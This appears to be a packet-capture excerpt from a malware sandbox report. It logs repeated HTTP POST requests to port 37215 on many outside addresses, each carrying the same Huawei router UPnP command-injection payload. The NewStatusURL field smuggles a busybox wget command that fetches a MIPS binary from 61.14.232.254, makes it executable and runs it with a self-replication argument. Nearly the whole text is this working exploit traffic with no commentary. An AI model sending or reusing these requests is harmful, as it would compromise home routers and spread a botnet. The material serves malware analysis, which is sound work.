                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2377192.168.2.1359934197.144.135.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.787055969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2378192.168.2.1343424157.218.38.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.787076950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2379192.168.2.1340366170.141.231.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.787092924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2380192.168.2.1334708117.31.168.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.787115097 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2381192.168.2.1342520157.241.65.22537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.793585062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2382192.168.2.1355200157.220.7.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.793612003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2383192.168.2.1357288157.202.46.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.793634892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2384192.168.2.1347290138.70.90.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.793657064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2385192.168.2.13339502.20.234.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.793669939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2386192.168.2.1346138157.55.165.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.793735027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
